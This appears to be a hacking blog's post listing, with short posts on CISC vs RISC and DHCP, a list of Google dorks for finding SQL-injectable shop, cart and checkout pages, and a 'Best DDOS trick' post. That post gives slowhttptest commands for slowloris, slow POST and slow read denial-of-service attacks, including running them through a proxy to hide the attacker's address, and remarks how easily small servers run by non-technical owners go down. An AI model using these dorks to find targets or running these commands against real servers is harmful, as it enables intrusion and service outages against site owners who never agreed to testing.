Skip to main content

Popular posts from this blog

CISC VS RISC computers (all details)

By
CISC Introduction            The term "CISC" (complex instruction set computer or computing) refers to computers designed with a full set of computer instructions that were intended to provide needed capabilities in the most efficient way. Intel's   Pentium   microprocessors are CISC microprocessors. CISC is a   processor design   where single   instructions   can execute several low-level operations (such as a load from   memory , an arithmetic   operation , and a   memory store ) or are capable of multi-step operations or   addressing modes   within single instructions. The primary goal of CISC architecture is to complete a task in as few lines of assembly as possible. This is achieved by building processor hardware that is capable of understanding & executing a series of operations, this is where our CISC architecture introduced. T...
Post a Comment
Read more

DHCP principle , DHCP server and client communication process

By
1. Explain with principle: the DHCP server and client communication process DHCP stands for Dynamic Host Configuration Protocol. It handles the automatic assignment of IP addresses and other configuration settings for devices on your network. DHCP automates Network and Sharing Center in your control panel. This is especially good for people who have laptops, aren't hooked up to the Internet all the time and often move from place to place with their portable devices. They can simply get a new IP address as needed without having to do it manually. DHCP is designed to make the assignment of IP addresses and other network configuration information faster and easier. DHCP is a protocol that uses Level 4 on the OSI model. It communicates using User Datagram Protocol (UDP) datagrams through UDP Port 68. DHCP works with most current and past Windows clients, and also Linux, Macintosh, and many network-capable printers. DHCP is desi...
1 comment
Read more

Google Dorks for sql injection | new 2017 |

By
default.php?catID= cart_additem.php?id= item_show.php?code_no= details.php?BookID= item.php?prodtype= inurl:php?id+site:it+show inurl:php?id+site:fr+show inurl:php?id+site:dk+shop inurl:php?id+site:pt+shop inurl:php?id+site:za+shop inurl:php?id+site:fi+shop acclogin.php?cartID= addToCart.php?idProduct= inurl:php?id+site:es+shop inurl:php?id+site:ro+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+checkout List.php?CatID= inurl:php?id+site:au+product inurl:php?id+site:au+succes inurl:php?id+site:uk+shop inurl:php?id+site:au+shop inurl:php?id+site:fr+shop inurl:php?id+site:it+shop inurl:php?id+site:de+shop inurl:php?id+site:pl+shop itemdetail.php?item= inurl:php?id+site:au+checkout
3 comments
Read more

Best DDOS trick you ever know | 2017 New post | enjoy

By
SlowHTTPTest is a highly configurable tool that simulates some Application
Layer Denial of Service attacks.It implements most common low-bandwidth Application
 Layer DoS attacks, such as slowloris, Slow HTTP POST, Slow Read attack(based on TCP persist timer exploit)
 by draining concurrent connections pool, as well as Apache Range Header attack by causing very significant
 memory and CPU usage on the server.Slowloris and Slow HTTP POST DoS attacks rely on the fact that the HTTP protocol, by design, requires
 requests to be completely received by the server before they are processed. If an HTTP request is not complete,
or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data.
 If the server keeps too many resources busy, this creates a denial of service.
 This tool is sending partial HTTP requests, trying to get denial of service from target HTTP server.
Installation for Debian based OS users.

apt-get install slowhttptest
Usage

slowhttptest is a great tool as it allows you to do many things. Following are few usages
Example of usage in slow message body mode

slowhttptest -c 1000 -B -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Same test with graph
slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u https://myseceureserver/resources/loginform.html -x 10 -p 3
Example of usage in slowloris mode

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Same test with graph
slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3
Example of usage in slow read mode with probing through proxy

Here x.x.x.x:8080 proxy used to have website availability from IP different than yours:
slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080
Conclusion:

If you can run multiple DoS tools such as GoldenEye,
 hping3 on a single web server, then it is very easy to knock it down.
 There are strategies to defend against such attacks, but for a small server
where resource is limited and run by non IT people (bloggers etc.)
it quickly becomes a nightmare.In the next tutorial how to protect agains Slow HTTP Attacks.
#best_DDOS trick

Comments

Post a Comment